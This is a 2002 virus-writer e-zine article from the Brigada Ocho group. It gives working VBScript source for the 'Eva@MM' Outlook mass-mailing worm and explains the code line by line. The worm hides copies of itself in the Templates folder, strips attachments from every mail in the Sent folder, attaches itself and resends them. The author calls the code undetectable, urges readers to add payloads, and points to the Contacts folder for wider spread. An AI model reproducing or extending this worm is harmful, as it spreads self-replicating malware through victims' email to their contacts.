-------------------->Another Outlook Worm Approach<-------------------- Author: KaGra,for e-zine#2,Brigada Ocho virii group member --------| Section 1/3 |-------- E-mail worms using Outlook have some difficulties spreading in the Wild,2 years plus after loveletter incident.One of the reasons are heuristics and also the same formula of coding such a worm (addresslists property,addressentries property,find all addresses in WAB and send to each etc.).In this article I present u new code to use with Outlook worm undetectable by now,but also (most important) ideas of future Outook worm coding.Here I present u only the replication routin.Anything else (payloads,anti-del etc) it's your job. The next paragraph presents the tested code (and fully functioning) of Eva@MM worm. The last paragraph has many comments upon the code section paragraph.So,the worm does the following things: a.It creates in a Folder (chosen by me) two copies of the worm,by the names run32dll.vbs and clickme.vbs . b.It checks a registry value (also chosen by me) if exists.If it not then takes all the mails already are in Sent folder of Outlook,clears everything in all mails (except of cource the "TO" field with the mail address),attaches to all of them itself and a subject and a Body and Sends them.When it completes only one mail in Sent Folder will exist. CooL Ha??LeT's GeT SoMe CodE StuFF NoW!!!! --------| Section 2/3 |-------- --------------------> Eva@MM Source CoDe Start HeRe! <------------------ line 1: On error resume next line 2: set fso=createobject("scripting.filesystemobject") line 3: set wscriptshell=createobject("wscript.shell") line 4: auto=wscriptshell.SpecialFolders("Templates") line 5: autos=auto & "\run32dll.vbs" line 6: fso.copyfile wscript.scriptfullname,autos line 7: mailed=auto & "\clickme.vbs" line 8: fso.copyfile wscript.scriptfullname,mailed line 9: if wscriptshell.regread("HKLM\SOFTWARE\Microsoft")<>"1" then line 10: set out=createobject("Outlook.Application") line 11: if out="Outlook" then line 12: set mapi=out.GetNameSpace("MAPI") line 13: set newitem=mapi.getdefaultfolder(5) line 14: do while newitem.items.count<>1 line 15: for each item in newitem.items line 16: do while item.Attachments.count<>0 line 17: for each itatt in item.Attachments line 18: itatt.delete line 19: next line 20: loop line 21: item.subject="Subject" line 22: item.Body="Body" line 23: item.attachments.add mailed line 24: item.send line 25: next line 26: loop line 27: set item=Nothing line 28: set itatt=nothing line 29: set newitem=Nothing line 30: set out=Nothing line 31: wscriptshell.regwrite "HKLM\SOFTWARE\Microsoft","1" line 32: end if line 33: end if -------------------------> End of Worm code here! <------------------------- --------| Section 3/3 |-------- In this Section I will analyze all lines of worm.Let's Go then. I think lines 1-8 do not any explanation.It just makes 2 copies of itself in Template Folder,which is a normally hidden Folder in Windows Folder.I choose this Folder because normally (If in Folder Options you have't check "show all files" property) you can't see its existance,and also the copies of the worm there. Now,line 9 checks if a value exists in the Registry.If yes,use Outlook replication.If not,then exit.Line 10 creates Outlook object,and if success (line 11) then execute lines 12-31,otherwise end. Now what do lines 12-31 do,is: call getnamespace property for mails to send at line 12 (this is standard in all Outlook worms),at line 13 get the Sent Folder (property:getdef- -aultfolder(5) ) , the do-loop of 14-26 says to do the inside code of this loop for all mails in Sent Folder,except one(this is also my option).Here "items" propery represents mails and "item" property a single mail.The "count" property is the number of current e-mails.The for-next of 15-25 says that the code inside this loop will be executed for each male found in Sent Folder (even though 14-26 and 15-25 seem to do the same,both are loops are needed).The do-while of 16-20 says to execute the code inside of this loop for exery attachments that may be in the mail.Don't forget that mails in Sent Folder where they are taken may already have attachments that should be removed to place our worm.The for-next of 17-19 erases all attachments in mail.Now, we go at lines 21-24 where Subject, attachment (the worm as attachment) and Body are added to each collected from Sent Folder mail.Line 24 sends the mails.Done with all loops,going at lines 21-30 to free some memory, setting some objects to Nothing.Finally,line 31 writes a value in Registry so next time worm executes,Outlook replication won't happen again.Lines 32-33 are from the if's at lines 9 and 11. Some comments: As you 've already see,propery getdefaultfolder(5) returns you the Sent Folder.If you place other numbers in it (and not 5) you 'll get all the other folders: 5 -----> Sent Folder 6 -----> Inbox Folder 4 -----> Outbox Folder 10 ----> Contact Folder (Means Address Book Entries!!!!!!!!!!) 3 -----> Deleted items Folder That's All FolKs.Using your Imagination,you can do many things,better that those I've already said.For example take some mails from specific folders,adding fake mails in Folders,sending attachments that already exist in Outlook mails,etc. It DePeNdS On YoU! With Respect to aLL Brigada Ocho MeMbers KaGra,October 2002,Greece